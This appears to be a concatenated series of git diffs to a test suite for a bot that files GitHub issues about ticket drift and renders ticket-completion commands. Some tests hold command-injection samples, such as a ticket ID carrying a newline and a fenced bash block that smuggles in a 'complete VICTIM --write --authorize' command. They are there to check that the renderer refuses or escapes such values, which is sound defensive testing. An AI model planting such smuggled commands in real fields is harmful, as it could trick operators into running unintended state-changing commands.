 // not the generic `<id>` form the "needs confirmation" guidance mentions in prose
 // (a substring check would read that as "offered" from text saying the opposite),
@@ -41,7 +41,7 @@ const readyCommandIds = (body) =>
   body
     .split('\n')
     .map((l) => l.trim())
-    .map((l) => l.match(/^adlc-tickets complete (\S+) --write --authorize --json$/))
+    .map((l) => l.match(/^adlc ticket complete (\S+) --write --authorize --json$/))
     .filter(Boolean)
     .map((m) => m[1]);
 const offersCommand = (body) => readyCommandIds(body).length > 0;
@@ -334,7 +334,7 @@ test('the procedure discloses the CI blind spots and leads with a dry run', () =
   assert.match(body, /cannot see whether a ticket is still being/); // the blind spot it can name
   assert.match(body, /gitignored/);
   const dryIdx = body.indexOf('# dry run');
-  const cmdIdx = body.indexOf('adlc-tickets complete');
+  const cmdIdx = body.indexOf('adlc ticket complete');
   assert.ok(dryIdx !== -1 && cmdIdx !== -1 && dryIdx < cmdIdx, 'the read-only dry run must come first');
 });
 
@@ -443,7 +443,7 @@ test('decideAction never throws on a malformed drift entry', () => {
 
 // ---- backend independence ----
 //
-// The remedy is the same on both backends. `adlc-tickets complete <id> --write
+// The remedy is the same on both backends. `adlc ticket complete <id> --write
 // --authorize` goes through TicketService and works identically on tickets.json
 // and the directory store (verified end-to-end in ceremony-drift-exit.test.mjs),
 // so there is no backend branch and no directory-specific raw-edit path — the
@@ -451,7 +451,7 @@ test('decideAction never throws on a malformed drift entry', () => {
 
 test('the body carries the canonical per-ticket command, never a raw shard edit', () => {
   const body = renderIssueBody(DONE);
-  assert.match(body, /adlc-tickets complete T7 --write --authorize/);
+  assert.match(body, /adlc ticket complete T7 --write --authorize/);
   assert.doesNotMatch(body, /add `completed: true` to each/); // the old raw-edit remedy
   assert.doesNotMatch(body, /not supported for the directory ticket store/);
 });
@@ -486,7 +486,7 @@ for (const id of SHELL_INJECTION_IDS) {
   test(`a malicious ticket id (${JSON.stringify(id).slice(0, 24)}) is never rendered as a command`, () => {
     const body = renderIssueBody([{ id, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
     // No runnable adlc-tickets line carries the raw id.
-    assert.ok(!body.split('\n').some((l) => l.trim().startsWith('adlc-tickets complete') && l.includes(id)),
+    assert.ok(!body.split('\n').some((l) => l.trim().startsWith('adlc ticket complete') && l.includes(id)),
       'the raw id must not appear in a runnable command');
     // It is surfaced as unsafe instead, not silently dropped.
     assert.match(body, /cannot be safely/);
@@ -495,7 +495,7 @@ for (const id of SHELL_INJECTION_IDS) {
 
 test('a safe id is rendered with --json (which suppresses interactive migration)', () => {
   const body = renderIssueBody([{ id: 'T-CC1', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
-  assert.match(body, /adlc-tickets complete T-CC1 --write --authorize --json/);
+  assert.match(body, /adlc ticket complete T-CC1 --write --authorize --json/);
 });
 
 test('a mix of safe and unsafe ids renders the safe one and flags the unsafe one', () => {
@@ -535,11 +535,11 @@ const fencedLines = (body) => {
 const assertNoInjectedCommand = (body) => {
   assert.ok(!fencedLines(body).some((l) => l.includes('VICTIM')), 'no injected command inside a fence');
   const runnable = body.split('\n').map((l) => l.trim())
-    .filter((l) => /^adlc-tickets complete VICTIM\b/.test(l));
+    .filter((l) => /^adlc ticket complete VICTIM\b/.test(l));
   assert.deepEqual(runnable, [], 'the injected command must not appear as a standalone runnable line');
 };
 
-const INJECTION_PAYLOAD = 'X\n\n```bash\nadlc-tickets complete VICTIM --write --authorize --json\n```\n';
+const INJECTION_PAYLOAD = 'X\n\n```bash\nadlc ticket complete VICTIM --write --authorize --json\n```\n';
 
 test('a newline+fence in a ticket ID cannot inject a runnable command block', () => {
   const body = renderIssueBody([
@@ -576,4 +576,24 @@ test('markdown metacharacters in a field are escaped, not rendered as structure'
     { id: 'T7', reason: 'explicit status: "done"', rails: ['`code`[link](x)*em*'], blocker: 'rails-freeze' },
   ]);
   assert.match(body, /\\`code\\`\\\[link\\\]\\\(x\\\)\\\*em\\\*/, 'metacharacters must be backslash-escaped');
+});
+
+// ---- an unbounded ID must not be able to blow the GitHub issue-body limit ----
+//
+// A confirmed id is interpolated RAW into the fenced command (it has to name the
+// real id), where the display clamp does not reach. The store accepts arbitrarily
+// long ids, so without a length bound a single pathological id could push the body
+// past GitHub's ~65_536-byte limit, failing every create/update and silently
+// disabling the reporter. Over the bound → surfaced without a command, not run.
+test('an over-long ticket id is not rendered as a runnable command', () => {
+  const longId = 'T' + 'x'.repeat(200);
+  const body = renderIssueBody([{ id: longId, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  assert.deepEqual(readyCommandIds(body), [], 'an over-long id must not become a runnable command');
+  assert.match(body, /cannot be safely/, 'and it is surfaced as unsafe, not silently dropped');
+});
+
+test('an id at the length bound is still rendered', () => {
+  const okId = 'T' + 'x'.repeat(127); // 128 chars total
+  const body = renderIssueBody([{ id: okId, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  assert.deepEqual(readyCommandIds(body), [okId]);
 });

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -19,9 +19,17 @@ import {
   MARKER,
 } from '../ceremony-drift.mjs';
 
+// Heuristic evidence: scope globs already resolve. Indistinguishable from an
+// ACTIVE ticket whose work touches existing paths, so it must never be swept
+// into a bulk-completion instruction.
 const DRIFT = [
   { id: 'T9', reason: 'inferred: all 6 declared scope glob(s) resolve to tracked files', rails: ['packages/ticket-sync/lib/schema.mjs'], blocker: 'rails-freeze' },
   { id: 'T42', reason: 'inferred: all 3 declared scope glob(s) resolve to tracked files', rails: ['packages/core/**'], blocker: 'rails-freeze' },
+];
+
+// Explicit evidence: the ticket itself asserts it is finished.
+const DONE = [
+  { id: 'T7', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
 ];
 
 // ---- rendering ----
@@ -34,9 +42,40 @@ test('body names every drifting ticket and its frozen rails', () => {
   }
 });
 
-test('body carries the exact ceremony command an operator must run', () => {
-  const body = renderIssueBody(DRIFT);
+test('body carries the exact ceremony command for EXPLICITLY done tickets', () => {
+  const body = renderIssueBody(DONE);
   assert.match(body, /ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin\/main/);
+  assert.match(body, /## Confirmed shipped/);
+});
+
+// The core safety property. `inferred:` means "every scope glob already resolves
+// to a tracked file", which is exactly what an ACTIVE ticket looks like when its
+// work touches existing paths. Completing such a ticket expires its rails
+// mid-build, and an instruction in a bot-filed issue carries more apparent
+// authority than a CLI someone chose to run.
+test('heuristic-only drift is NEVER given the bulk completion command', () => {
+  const body = renderIssueBody(DRIFT);
+  assert.doesNotMatch(body, /ticket-prune --ceremony/);
+  assert.match(body, /## Needs confirmation before completing \(2\)/);
+  assert.match(body, /cannot distinguish "finished" from "in progress on existing files"/);
+});
+
+test('the ACTIVE ticket is quarantined out of every completion instruction', () => {
+  const body = renderIssueBody([...DONE, ...DRIFT], { activeTicketId: 'T42' });
+  assert.match(body, /## ⚠ Currently active — do NOT complete \(1\)/);
+  const activeIdx = body.indexOf('Currently active');
+  const confirmedIdx = body.indexOf('## Confirmed shipped');
+  assert.ok(activeIdx < confirmedIdx, 'the warning must precede any command');
+  // T42 must not appear under the clearable heading.
+  const confirmedSection = body.slice(confirmedIdx, body.indexOf('## Needs confirmation'));
+  assert.doesNotMatch(confirmedSection, /T42/);
+  assert.match(body, /expire its rails while it is still being built/);
+});
+
+test('an explicitly-done ticket that is ALSO active stays quarantined', () => {
+  const body = renderIssueBody(DONE, { activeTicketId: 'T7' });
+  assert.match(body, /## ⚠ Currently active/);
+  assert.doesNotMatch(body, /ticket-prune --ceremony/);
 });
 
 test('body embeds the discovery marker', () => {
@@ -53,7 +92,7 @@ test('marker is a well-formed HTML comment (renders invisibly)', () => {
 // This line is the operator-facing statement of the T36 rule. Inverted, it is
 // not a typo — it is wrong instructions in the one place someone reads them.
 test('body states the completion rule correctly', () => {
-  const body = renderIssueBody(DRIFT);
+  const body = renderIssueBody(DONE);
   assert.match(body, /marked `completed: true`/);
   assert.doesNotMatch(body, /marked `completed: false`/);
 });
@@ -143,14 +182,14 @@ test('body is stable regardless of input order (idempotence depends on this)', (
 // 'rails-freeze'. An earlier version of this test gave it rails, asserting
 // against a state the producer cannot emit.
 const MIXED = [
-  { id: 'T1', reason: 'r', rails: ['a/**'], blocker: 'rails-freeze' },
-  { id: 'T2', reason: 'r', rails: [], blocker: 'preexisting-completed-field' },
+  { id: 'T1', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
+  { id: 'T2', reason: 'explicit status: "done"', rails: [], blocker: 'preexisting-completed-field' },
 ];
 
 test('body separates the two blockers into their own sections', () => {
   const body = renderIssueBody(MIXED);
-  assert.match(body, /## Clearable by the ceremony \(1\)/);
-  assert.match(body, /## Needs a manual decision \(1\)/);
+  assert.match(body, /## Confirmed shipped — clearable by the ceremony \(1\)/); // rails-freeze
+  assert.match(body, /## Needs a manual decision \(1\)/);                       // preexisting-completed-field
 });
 
 // The advertised command completes ONLY rails-freeze entries; --ceremony refuses
@@ -177,6 +216,36 @@ test('a drift set of only manual-decision entries advertises no ceremony command
 test('title does not claim rails are frozen', () => {
   assert.doesNotMatch(renderIssueTitle(MIXED), /freezing rails/);
   assert.match(renderIssueTitle(MIXED), /2 shipped tickets awaiting completion/);
+});
+
+// Evidence handling is an ALLOW-LIST: anything that is not an explicit
+// done-status — inferred, absent, malformed, or a reason string that gets
+// renamed upstream — must land in "needs confirmation". Failing open here would
+// promote a ticket into the rail-expiring command on evidence nobody verified.
+test('unknown or missing evidence falls back to needs-confirmation, not clearable', () => {
+  for (const reason of [undefined, '', 'r', 'some future reason string', null]) {
+    const body = renderIssueBody([{ id: 'TX', reason, rails: ['a/**'], blocker: 'rails-freeze' }]);
+    assert.doesNotMatch(body, /ticket-prune --ceremony/, `reason ${JSON.stringify(reason)} must not be clearable`);
+    assert.match(body, /## Needs confirmation before completing \(1\)/);
+  }
+});
+
+// resolveActiveTicketId returns a RESULT and never throws; a malformed or
+// conflicting pointer is ok:false (#196's fail-closed contract). When it cannot
+// be resolved we do not know which ticket is in flight, so nothing may be
+// advertised as safe to bulk-complete — not even explicitly-done entries.
+test('an unresolvable active-ticket pointer suppresses the bulk command entirely', () => {
+  const body = renderIssueBody(DONE, { activeTicketUnknown: true });
+  assert.doesNotMatch(body, /ticket-prune --ceremony/);
+  assert.doesNotMatch(body, /## Confirmed shipped/);
+  assert.match(body, /## Needs confirmation before completing \(1\)/);
+  assert.match(body, /active-ticket pointer could not be resolved/);
+});
+
+test('decideAction threads the unknown-pointer state into the body', () => {
+  const d = decideAction({ drift: DONE, existingIssue: null, activeTicketUnknown: true });
+  assert.equal(d.action, 'open');
+  assert.doesNotMatch(d.body, /ticket-prune --ceremony/);
 });
 
 // ---- decisions ----

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -1,0 +1,111 @@
+// ceremony-drift.test.mjs — the drift reporter's decision logic.
+//
+// This job runs on a schedule and after every merge to main. Its whole value is
+// being a signal someone still trusts months from now, so the decision logic is
+// tested directly: it must be IDEMPOTENT (a re-run with unchanged drift must not
+// touch the issue) and it must CLOSE the issue when drift clears. A reporter
+// that re-posts or re-opens on every tick is one people mute.
+//
+// Only pure decision/render logic is covered here. The `gh` I/O is a thin shell
+// in the script's main(), deliberately kept free of branching.
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { renderIssueBody, decideAction, MARKER } from '../ceremony-drift.mjs';
+
+const DRIFT = [
+  { id: 'T9', reason: 'inferred: all 6 declared scope glob(s) resolve to tracked files', rails: ['packages/ticket-sync/lib/schema.mjs'], blocker: 'rails-freeze' },
+  { id: 'T42', reason: 'inferred: all 3 declared scope glob(s) resolve to tracked files', rails: ['packages/core/**'], blocker: 'rails-freeze' },
+];
+
+// ---- rendering ----
+
+test('body names every drifting ticket and its frozen rails', () => {
+  const body = renderIssueBody(DRIFT);
+  for (const t of DRIFT) {
+    assert.match(body, new RegExp(t.id));
+    for (const rail of t.rails) assert.ok(body.includes(rail), `missing rail ${rail}`);
+  }
+});
+
+test('body carries the exact ceremony command an operator must run', () => {
+  const body = renderIssueBody(DRIFT);
+  assert.match(body, /ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin\/main/);
+});
+
+test('body embeds the discovery marker', () => {
+  assert.ok(renderIssueBody(DRIFT).includes(MARKER));
+});
+
+// Ordering must not depend on the order runTicketPrune happens to emit, or the
+// body churns between runs and every tick looks like new drift.
+test('body is stable regardless of input order (idempotence depends on this)', () => {
+  assert.equal(renderIssueBody(DRIFT), renderIssueBody([...DRIFT].reverse()));
+});
+
+test('body distinguishes the two blocker kinds', () => {
+  const mixed = [
+    { id: 'T1', reason: 'r', rails: ['a/**'], blocker: 'rails-freeze' },
+    { id: 'T2', reason: 'r', rails: ['b/**'], blocker: 'preexisting-completed-field' },
+  ];
+  const body = renderIssueBody(mixed);
+  assert.match(body, /rails-freeze/);
+  assert.match(body, /preexisting-completed-field/);
+});
+
+// ---- decisions ----
+
+test('drift with no existing issue → open', () => {
+  const d = decideAction({ drift: DRIFT, existingIssue: null });
+  assert.equal(d.action, 'open');
+  assert.ok(d.title.length > 0);
+  assert.ok(d.body.includes(MARKER));
+});
+
+test('drift with an identical open issue → noop (no re-post churn)', () => {
+  const first = decideAction({ drift: DRIFT, existingIssue: null });
+  const again = decideAction({
+    drift: DRIFT,
+    existingIssue: { number: 7, title: first.title, body: first.body },
+  });
+  assert.equal(again.action, 'noop');
+});
+
+test('drift that CHANGED vs the open issue → update', () => {
+  const first = decideAction({ drift: DRIFT, existingIssue: null });
+  const grown = decideAction({
+    drift: [...DRIFT, { id: 'T99', reason: 'r', rails: ['z/**'], blocker: 'rails-freeze' }],
+    existingIssue: { number: 7, title: first.title, body: first.body },
+  });
+  assert.equal(grown.action, 'update');
+  assert.equal(grown.number, 7);
+  assert.match(grown.body, /T99/);
+});
+
+test('a title-only change still updates', () => {
+  const first = decideAction({ drift: DRIFT, existingIssue: null });
+  const d = decideAction({
+    drift: DRIFT,
+    existingIssue: { number: 7, title: 'something stale', body: first.body },
+  });
+  assert.equal(d.action, 'update');
+});
+
+test('drift cleared with an open issue → close', () => {
+  const d = decideAction({ drift: [], existingIssue: { number: 7, title: 't', body: 'b' } });
+  assert.equal(d.action, 'close');
+  assert.equal(d.number, 7);
+});
+
+test('no drift and no issue → noop', () => {
+  assert.equal(decideAction({ drift: [], existingIssue: null }).action, 'noop');
+});
+
+// The reporter must never be the reason a merge or a schedule tick fails: it is
+// an issue-management job, not a gate. Callers rely on this to keep exit 0.
+test('decideAction never throws on a malformed drift entry', () => {
+  const junk = [{ id: 'T1' }, {}, { id: 'T2', rails: null, blocker: undefined }];
+  const d = decideAction({ drift: junk, existingIssue: null });
+  assert.equal(d.action, 'open');
+  assert.match(d.body, /T1/);
+});

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -318,7 +318,7 @@ test('decideAction threads the unknown-pointer state into the body', () => {
 // The procedure section is the one place the command appears. It must always
 // disclose what CI cannot see, and always lead with the dry run.
 test('the procedure discloses the CI blind spots and leads with a dry run', () => {
-  const body = renderIssueBody(DRIFT);
+  const body = renderIssueBody(DONE); // explicit-done, so the command is present
   assert.ok(offersCommand(body), 'the procedure documents the command');
   assert.match(body, /cannot tell you it is safe to run the command/);
   assert.match(body, /gitignored/);                       // the place blind spot
@@ -326,6 +326,35 @@ test('the procedure discloses the CI blind spots and leads with a dry run', () =
   const dryIdx = body.indexOf('# dry run');
   assert.ok(dryIdx !== -1 && dryIdx < body.indexOf(RUNNABLE), 'dry run must come first');
   assert.ok(makesNoSafetyClaim(body));
+});
+
+// The mutating command is EVIDENCE-GATED, not just captioned. A warning is not an
+// enforced invariant: in CI the active-ticket quarantine cannot fire (the pointer
+// is gitignored), so heuristic entries must not even be handed the command.
+test('heuristic-only drift shows the dry run but withholds the mutating command', () => {
+  const body = renderIssueBody(DRIFT); // both entries are `inferred:`
+  assert.match(body, /# dry run/, 'the read-only dry run is always available');
+  assert.ok(!offersCommand(body), 'no rail-expiring command without authoritative evidence');
+  assert.match(body, /No completion command is shown/);
+});
+
+test('a confirmed entry alongside a heuristic one still withholds the command', () => {
+  // The bulk command completes ALL rail-freezing tickets, so one unconfirmed
+  // entry taints the whole set — same reasoning as the round-6 blast-radius fix.
+  const body = renderIssueBody([
+    { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
+    { id: 'T9', reason: 'inferred: scope resolves', rails: ['b/**'], blocker: 'rails-freeze' },
+  ]);
+  assert.ok(!offersCommand(body));
+  assert.match(body, /No completion command is shown/);
+});
+
+test('the mutating command appears only when every rail-freezing entry is explicit-done', () => {
+  const body = renderIssueBody([
+    { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
+    { id: 'T8', reason: 'explicit status: "done"', rails: ['b/**'], blocker: 'rails-freeze' },
+  ]);
+  assert.ok(offersCommand(body));
 });
 
 test('a drift set with nothing rail-freezing renders no procedure at all', () => {
@@ -406,8 +435,10 @@ test('a directory-store repo gets a manual remedy, not the unusable command', ()
   assert.match(body, /add `completed: true` to each ticket/);
 });
 
-test('a tickets.json repo still gets the command', () => {
-  assert.ok(offersCommand(renderIssueBody(DRIFT, { ceremonySupported: true })));
+test('a tickets.json repo gets the command (when evidence allows it)', () => {
+  // DONE is explicit-done, so the command is not withheld by the evidence gate —
+  // this isolates the backend behaviour from the evidence gate.
+  assert.ok(offersCommand(renderIssueBody(DONE, { ceremonySupported: true })));
 });
 
 test('backend support defaults to the tickets.json behaviour', () => {

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -32,16 +32,22 @@ const DONE = [
   { id: 'T7', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
 ];
 
-// Asserting on /ticket-prune --ceremony/ is NOT sufficient: the body also
-// MENTIONS the command in prose explaining why it is being withheld. A substring
-// check would then read "the command is offered" from text saying the opposite.
-// This looks for the runnable line inside the fenced block.
-// No `--write`: that flag also tombstones rails-less stale tickets, which never
-// appear in this report, so the command would write outside the set it shows.
-// Pinned literally here so reintroducing the flag fails this suite too, not only
-// the end-to-end blast-radius test.
-const RUNNABLE = 'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main';
-const offersCommand = (body) => body.split('\n').some((l) => l.trim() === RUNNABLE);
+// The remedy is a PER-TICKET canonical completion: `adlc-tickets complete <id>
+// --write --authorize`. A ready command is a fenced line naming a SPECIFIC id —
+// not the generic `<id>` form the "needs confirmation" guidance mentions in prose
+// (a substring check would read that as "offered" from text saying the opposite),
+// and not the read-only dry run.
+const readyCommandIds = (body) =>
+  body
+    .split('\n')
+    .map((l) => l.trim())
+    .map((l) => l.match(/^adlc-tickets complete (\S+) --write --authorize$/))
+    .filter(Boolean)
+    .map((m) => m[1]);
+const offersCommand = (body) => readyCommandIds(body).length > 0;
+// The bulk command must never reappear — it recomputed its set (TOCTOU) and had
+// no per-ticket filter (blast radius). Both are why it was replaced.
+const offersBulkCommand = (body) => /ticket-prune --ceremony/.test(body);
 
 // The report documents the ceremony as a PROCEDURE WITH PRECONDITIONS. It never
 // certifies it as safe, because it cannot: it renders a snapshot at commit A
@@ -318,43 +324,52 @@ test('decideAction threads the unknown-pointer state into the body', () => {
 // The procedure section is the one place the command appears. It must always
 // disclose what CI cannot see, and always lead with the dry run.
 test('the procedure discloses the CI blind spots and leads with a dry run', () => {
-  const body = renderIssueBody(DONE); // explicit-done, so the command is present
-  assert.ok(offersCommand(body), 'the procedure documents the command');
-  assert.match(body, /cannot tell you it is safe to run the command/);
-  assert.match(body, /gitignored/);                       // the place blind spot
-  assert.match(body, /re-computes its own target set/);   // the time blind spot
+  const body = renderIssueBody(DONE); // explicit-done, so a per-ticket command is present
+  assert.ok(offersCommand(body), 'the procedure documents the completion command');
+  assert.match(body, /cannot see whether a ticket is still being/); // the blind spot it can name
+  assert.match(body, /gitignored/);
   const dryIdx = body.indexOf('# dry run');
-  assert.ok(dryIdx !== -1 && dryIdx < body.indexOf(RUNNABLE), 'dry run must come first');
-  assert.ok(makesNoSafetyClaim(body));
+  const cmdIdx = body.indexOf('adlc-tickets complete');
+  assert.ok(dryIdx !== -1 && cmdIdx !== -1 && dryIdx < cmdIdx, 'the read-only dry run must come first');
 });
 
-// The mutating command is EVIDENCE-GATED, not just captioned. A warning is not an
-// enforced invariant: in CI the active-ticket quarantine cannot fire (the pointer
-// is gitignored), so heuristic entries must not even be handed the command.
-test('heuristic-only drift shows the dry run but withholds the mutating command', () => {
+// The bulk `ticket-prune --ceremony` is gone entirely: it recomputed its target
+// set at run time (a TOCTOU window) and had no per-ticket filter. Its replacement
+// names one id per command, so neither failure mode is expressible.
+test('the report never renders the bulk ceremony command', () => {
+  for (const fixture of [DONE, DRIFT, [...DONE, ...DRIFT]]) {
+    assert.ok(!offersBulkCommand(renderIssueBody(fixture)), 'bulk ticket-prune --ceremony must not appear');
+  }
+});
+
+// A ready command is offered ONLY for confirmed (explicit-done) entries. A
+// heuristic entry gets no specific command — but note it does NOT suppress the
+// commands for confirmed entries beside it (see the next test), because per-ticket
+// commands don't share a blast radius.
+test('heuristic-only drift shows the dry run but offers no ready command', () => {
   const body = renderIssueBody(DRIFT); // both entries are `inferred:`
   assert.match(body, /# dry run/, 'the read-only dry run is always available');
-  assert.ok(!offersCommand(body), 'no rail-expiring command without authoritative evidence');
-  assert.match(body, /No completion command is shown/);
+  assert.deepEqual(readyCommandIds(body), [], 'no ready command without authoritative evidence');
 });
 
-test('a confirmed entry alongside a heuristic one still withholds the command', () => {
-  // The bulk command completes ALL rail-freezing tickets, so one unconfirmed
-  // entry taints the whole set — same reasoning as the round-6 blast-radius fix.
+// The round-6 blast-radius limitation is GONE. Under the old bulk command, one
+// heuristic entry tainted the whole set and withheld the command from everyone.
+// Per-ticket commands are scoped to a single id, so a confirmed ticket beside a
+// heuristic one still gets its own command — and the heuristic one does not.
+test('a confirmed entry beside a heuristic one gets its own command; the heuristic one does not', () => {
   const body = renderIssueBody([
     { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
     { id: 'T9', reason: 'inferred: scope resolves', rails: ['b/**'], blocker: 'rails-freeze' },
   ]);
-  assert.ok(!offersCommand(body));
-  assert.match(body, /No completion command is shown/);
+  assert.deepEqual(readyCommandIds(body), ['T7'], 'only the confirmed ticket gets a ready command');
 });
 
-test('the mutating command appears only when every rail-freezing entry is explicit-done', () => {
+test('every confirmed entry gets its own per-ticket command', () => {
   const body = renderIssueBody([
     { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
     { id: 'T8', reason: 'explicit status: "done"', rails: ['b/**'], blocker: 'rails-freeze' },
   ]);
-  assert.ok(offersCommand(body));
+  assert.deepEqual(readyCommandIds(body).sort(), ['T7', 'T8']);
 });
 
 test('a drift set with nothing rail-freezing renders no procedure at all', () => {
@@ -421,31 +436,23 @@ test('decideAction never throws on a malformed drift entry', () => {
   assert.match(d.body, /T1/);
 });
 
-// ---- backend compatibility ----
+// ---- backend independence ----
 //
-// `ticket-prune --ceremony` is not implemented for the directory ticket store
-// (run.mjs returns "not supported for the directory ticket store yet"). Publishing
-// the command to a repo on that backend would send an operator to a deterministic
-// error and leave the rails frozen, so the remedy is backend-specific.
+// The remedy is the same on both backends. `adlc-tickets complete <id> --write
+// --authorize` goes through TicketService and works identically on tickets.json
+// and the directory store (verified end-to-end in ceremony-drift-exit.test.mjs),
+// so there is no backend branch and no directory-specific raw-edit path — the
+// latter bypassed the store's lock, CAS, journal, and manifest evidence.
 
-test('a directory-store repo gets a manual remedy, not the unusable command', () => {
-  const body = renderIssueBody(DRIFT, { ceremonySupported: false });
-  assert.ok(!offersCommand(body), 'the ceremony command does not work on this backend');
-  assert.match(body, /not supported for the directory ticket store/);
-  assert.match(body, /add `completed: true` to each ticket/);
+test('the body carries the canonical per-ticket command, never a raw shard edit', () => {
+  const body = renderIssueBody(DONE);
+  assert.match(body, /adlc-tickets complete T7 --write --authorize/);
+  assert.doesNotMatch(body, /add `completed: true` to each/); // the old raw-edit remedy
+  assert.doesNotMatch(body, /not supported for the directory ticket store/);
 });
 
-test('a tickets.json repo gets the command (when evidence allows it)', () => {
-  // DONE is explicit-done, so the command is not withheld by the evidence gate —
-  // this isolates the backend behaviour from the evidence gate.
-  assert.ok(offersCommand(renderIssueBody(DONE, { ceremonySupported: true })));
-});
-
-test('backend support defaults to the tickets.json behaviour', () => {
-  assert.equal(renderIssueBody(DRIFT), renderIssueBody(DRIFT, { ceremonySupported: true }));
-});
-
-test('decideAction threads the backend through to the body', () => {
-  const d = decideAction({ drift: DRIFT, existingIssue: null, ceremonySupported: false });
-  assert.ok(!offersCommand(d.body));
+test('the completion command records evidence and uses the transaction (documented)', () => {
+  const body = renderIssueBody(DONE);
+  assert.match(body, /\.adlc\/manifest\.jsonl/, 'the body tells the operator evidence is recorded');
+  assert.match(body, /transaction/);
 });

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -86,6 +86,41 @@ test('selectTrackingIssue returns null when no issue carries the marker', () => 
   assert.equal(selectTrackingIssue(null), null);
 });
 
+// The marker is public — it renders into the issue body and is trivially copied.
+// Treating "body contains the marker" as authority would let anyone who can open
+// an issue have it labeled, rewritten, or closed by a job holding issues:write.
+test('an authors filter rejects a forged marker from another author', () => {
+  const issues = [{ number: 9, body: `${MARKER} forged`, author: { login: 'untrusted-user' } }];
+  assert.equal(selectTrackingIssue(issues, { authors: ['github-actions[bot]'] }), null);
+  // Without the filter (the labeled fast path) the same issue is still matched —
+  // there, applying the label was itself the authorization.
+  assert.equal(selectTrackingIssue(issues)?.number, 9);
+});
+
+test('an authors filter accepts the managed author', () => {
+  const issues = [{ number: 9, body: `${MARKER} real`, author: { login: 'github-actions[bot]' } }];
+  assert.equal(selectTrackingIssue(issues, { authors: ['github-actions[bot]'] }).number, 9);
+});
+
+// Guessing between two marked issues risks overwriting or closing the wrong one,
+// and both are destructive under issues:write.
+test('two marked issues throw rather than picking one', () => {
+  const two = [
+    { number: 1, body: `${MARKER} a`, author: { login: 'github-actions[bot]' } },
+    { number: 2, body: `${MARKER} b`, author: { login: 'github-actions[bot]' } },
+  ];
+  assert.throws(() => selectTrackingIssue(two), /ambiguous tracking issue/);
+  assert.throws(() => selectTrackingIssue(two, { authors: ['github-actions[bot]'] }), /ambiguous/);
+});
+
+test('ambiguity is judged AFTER the author filter (one real + one forged is fine)', () => {
+  const mixed = [
+    { number: 1, body: `${MARKER} real`, author: { login: 'github-actions[bot]' } },
+    { number: 2, body: `${MARKER} forged`, author: { login: 'untrusted-user' } },
+  ];
+  assert.equal(selectTrackingIssue(mixed, { authors: ['github-actions[bot]'] }).number, 1);
+});
+
 test('selectTrackingIssue tolerates missing/non-string bodies without throwing', () => {
   const found = selectTrackingIssue([
     { number: 1 },

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -628,3 +628,19 @@ test('the clamp is deterministic (idempotence holds for over-limit bodies)', () 
   }));
   assert.equal(renderIssueBody(many), renderIssueBody(many));
 });
+
+// ---- a railed completed:false ticket is never advertised for completion ----
+//
+// The producer routes a ticket with a deliberately-set `completed` value to
+// blocker 'preexisting-completed-field' (see detect.mjs), even when it freezes
+// rails. The reporter must then keep it OUT of the runnable-command path — a
+// command would overwrite the deliberate value and expire rails the author kept
+// on purpose. Round-21 finding.
+test('a railed preexisting-completed-field entry gets no runnable command', () => {
+  const body = renderIssueBody([
+    { id: 'SEC', reason: 'explicit status: "done"', rails: ['security/**'], blocker: 'preexisting-completed-field' },
+  ]);
+  assert.deepEqual(readyCommandIds(body), [], 'must not advertise completing a deliberate completed value');
+  assert.match(body, /## Needs a manual decision/);
+  assert.match(body, /will \*\*not\*\* clear/);
+});

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -597,3 +597,34 @@ test('an id at the length bound is still rendered', () => {
   const body = renderIssueBody([{ id: okId, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
   assert.deepEqual(readyCommandIds(body), [okId]);
 });
+
+// ---- aggregate body size is bounded (round-20 finding) ----
+//
+// Per-field/per-id caps bound one entry, but the NUMBER of drifting tickets and
+// the NUMBER of rails per ticket are both unbounded. An over-limit body fails
+// every GitHub create/update and silently disables the reporter. Both are capped,
+// with visible "omitted"/"truncated" notices — never a silent cut.
+import { MAX_BODY } from '../ceremony-drift.mjs';
+
+test('a ticket with very many rails shows a bounded list with an omitted-count', () => {
+  const rails = Array.from({ length: 100 }, (_, i) => `packages/x${i}/**`);
+  const body = renderIssueBody([{ id: 'T7', reason: 'inferred: x', rails, blocker: 'rails-freeze' }]);
+  assert.match(body, /…and 75 more/, 'omitted rails are counted, not dropped silently');
+});
+
+test('a very large drift set clamps the body under the GitHub limit, marker preserved', () => {
+  const many = Array.from({ length: 5000 }, (_, i) => ({
+    id: `T${i}`, reason: 'inferred: x', rails: ['packages/core/**'], blocker: 'rails-freeze',
+  }));
+  const body = renderIssueBody(many);
+  assert.ok(body.length <= MAX_BODY, `body ${body.length} must be <= ${MAX_BODY}`);
+  assert.match(body, /was truncated/, 'truncation is visible, not silent');
